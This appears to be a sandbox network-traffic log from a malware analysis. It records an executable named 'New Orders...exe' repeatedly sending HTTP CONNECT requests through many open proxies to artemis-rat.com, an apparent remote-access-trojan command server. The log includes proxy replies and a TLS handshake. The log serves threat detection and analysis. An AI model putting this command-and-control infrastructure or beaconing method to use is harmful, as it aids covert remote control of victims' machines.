                                                                                        1446192.168.2.9541873.123.150.19231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.874552011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.183283091 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1447192.168.2.954172177.67.136.24141537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.874646902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1448192.168.2.954168185.220.226.1288087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.874907017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1449192.168.2.954171103.23.100.141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.874911070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1450192.168.2.952229188.163.170.130412097672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.886933088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.945357084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.945420980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1451192.168.2.95417027.76.193.21310807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.892890930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1452192.168.2.954174170.84.205.1741537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.893289089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1453192.168.2.95374469.160.223.3381817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.893332005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.069955111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.070411921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1454192.168.2.954213217.23.11.194471527672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.896040916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.193892956 CET226INHTTP/1.1 403 Forbidden
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Length: 101
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                                        Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1455192.168.2.952152146.59.18.246498717672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.898013115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1456192.168.2.954215147.75.34.85100117672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.903347969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.208213091 CET356INHTTP/1.0 502 Bad Gateway
                                                                                        Server: Zscaler/6.3
                                                                                        Content-Type: text/html
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1457192.168.2.952061185.250.27.5431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.903459072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.945373058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.945533991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.037729979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:10.100605011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:22.132509947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:34.132491112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1458192.168.2.95415774.118.80.24431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.903938055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1459192.168.2.95422523.164.240.8480817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.926404953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.664017916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.668168068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.570821047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.476475000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1460192.168.2.95420578.30.128.1080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.928070068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1461192.168.2.954173203.112.134.7456787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.929759026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1462192.168.2.954235177.38.5.1641537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.951756954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1463192.168.2.954176175.183.82.22181977672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.034739017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1464192.168.2.954219202.40.181.220312477672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.038059950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1465192.168.2.95379591.134.140.160490427672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.040787935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.663849115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.164812088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.164393902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.164230108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.273447037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.273600101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1466192.168.2.95386166.228.35.209448097672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.040791988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.070365906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.070348024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.163970947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:10.163763046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:22.163790941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:34.273246050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:58.273221970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1467192.168.2.95422445.124.184.13807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.051848888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.657497883 CET60INHTTP/1.0 200 Connection Established
                                                                                        Proxy-agent: Apache
                                                                                        Mar 11, 2024 16:16:51.550312996 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 62 e0 00 76 4b 41 17 b9 d7 1a 43 ae 3f c2 0e 0b 95 90 b0 22 81 45 9a e9 7c 3d 59 21 11 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: e bvKAC?"E|=Y!*,+0/$#('=<5/Uartemis-rat.com#
                                                                                        Mar 11, 2024 16:16:52.020456076 CET1286INData Raw: 16 03 03 07 a0 02 00 00 51 03 03 65 ef 20 72 37 bf 8c d3 f5 0e d2 d4 fe 51 1b 99 a6 84 29 6d 48 cf e0 dc fd 66 99 de 4e 44 f6 f7 20 65 82 40 8b bc ba 71 8e 6d 48 fd fa 9c b0 01 ed e8 d2 ea 4f 22 e4 70 5a 9b 3d 6a ae d6 f9 7b 54 c0 2c 00 00 09 ff
                                                                                        Data Ascii: Qe r7Q)mHfND e@qmHO"pZ=j{T,005}AHL"Sg"0*H010UUS10UCalifornia10USunnyvale10UFortinet10UCertif
                                                                                        Mar 11, 2024 16:16:52.020483017 CET671INData Raw: ad 6e 4b 2b 54 e7 00 36 d6 45 93 8a 64 db ba 10 c4 9b 54 37 b6 ab 5e 13 d8 7d 04 34 91 c1 4e a6 55 4f b2 ff 16 be ca ac af d6 90 e4 2c c1 77 98 86 f8 0d bf 8d a6 47 0f 3e a0 d1 ba 42 57 c6 e8 38 8e f7 e4 97 57 94 93 ec 03 fb eb f4 2c 36 b5 4a 4e
                                                                                        Data Ascii: nK+T6EdT7^}4NUO,wG>BW8W,6JNz9TF>y~caIN02s#`0xm7^^=4%0kc[O.Z{ua=$W!y8_|4"pfNNd:
                                                                                        Mar 11, 2024 16:16:52.259601116 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 16 c0 57 e1 ab cc 49 0b b5 80 fa 3e 43 d7 2c fd e5 65 d7 8c 07 35 02 0b e8 46 22 ba e0 94 7c 11 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 f5 68 f7 70 f4 95 63 fc 1a 6d 1f 88 4d f4 8c f9 31 d5 a6 f1 85
                                                                                        Data Ascii: %! WI>C,e5F"|(hpcmM1`&;'
                                                                                        Mar 11, 2024 16:16:52.705698013 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 1f 37 69 d6 c8 c0 45 63 96 c2 e6 20 b6 47 32 b9 57 e7 3d 74 95 10 cb b0 3c 98 99 cb 6f fb 0d ee
                                                                                        Data Ascii: (7iEc G2W=t<o


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1468192.168.2.95249254.36.122.16445877672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.053567886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1469192.168.2.954240103.153.154.6807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
